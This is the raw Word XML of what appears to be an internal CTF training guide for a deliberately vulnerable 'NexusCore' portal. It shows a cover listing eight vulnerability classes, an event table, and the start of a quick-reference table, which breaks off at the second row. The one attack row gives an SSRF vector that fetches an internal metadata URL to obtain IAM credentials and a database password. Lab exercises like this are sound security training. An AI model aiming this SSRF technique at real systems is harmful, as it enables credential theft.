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B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="700"/>
              <w:left w:type="dxa" w:w="500"/>
              <w:bottom w:type="dxa" w:w="700"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:t xml:space="preserve">NexusCore</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="4A90D9"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:t xml:space="preserve">Technologies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="500" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8AAFCC"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal Security Portal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="B7950B" w:sz="6" w:space="1"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="40" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="300"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="E8C96A"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">CTF Round 2 — Red &amp; Blue Team Guide</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="500" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7AACCC"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">8 Advanced Vulnerabilities — Detailed Attack &amp; Defence</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="80" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="4A6A8A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF  ·  XXE  ·  Command Injection  ·  JWT Algorithm Confusion</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="4A6A8A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Race Condition  ·  Insecure Deserialization  ·  GraphQL  ·  SSTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="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8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="676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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CTF Round 2 — Winner Selection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F6F7"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FAFBFC"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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NexusCore Technologies Internal Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="676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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7007  →  http://localhost:7007</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F6F7"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FAFBFC"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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced (All 8 vulnerabilities)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unique From</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="676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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Round 1 NexusBank — Zero overlap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F6F7"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FAFBFC"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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit all 8 vulnerabilities, capture flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB"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olor w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Blue Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="676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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Identify root causes, apply code-level patches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0B1929" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B1929"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">📋 Quick Reference — All 8 Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All vulnerabilities in NexusCore Round 2. Every vulnerability is unique — not repeated from Round 1 NexusBank branches.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000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="3480"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0B1929" w:sz="1"/>
              <w:left w:val="single" w:color="0B1929" w:sz="1"/>
              <w:bottom w:val="single" w:color="0B1929" w:sz="1"/>
              <w:right w:val="single" w:color="0B1929" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0B1929" w:sz="1"/>
              <w:left w:val="single" w:color="0B1929" w:sz="1"/>
              <w:bottom w:val="single" w:color="0B1929" w:sz="1"/>
              <w:right w:val="single" w:color="0B1929" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0B1929" w:sz="1"/>
              <w:left w:val="single" w:color="0B1929" w:sz="1"/>
              <w:bottom w:val="single" w:color="0B1929" w:sz="1"/>
              <w:right w:val="single" w:color="0B1929" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0B1929" w:sz="1"/>
              <w:left w:val="single" w:color="0B1929" w:sz="1"/>
              <w:bottom w:val="single" w:color="0B1929" w:sz="1"/>
              <w:right w:val="single" w:color="0B1929" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0B1929" w:sz="1"/>
              <w:left w:val="single" w:color="0B1929" w:sz="1"/>
              <w:bottom w:val="single" w:color="0B1929" w:sz="1"/>
              <w:right w:val="single" w:color="0B1929" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0B1929" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Quick Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/integrations/fetch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Fetch http://127.0.0.1:7007/internal/metadata → IAM creds + DB password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
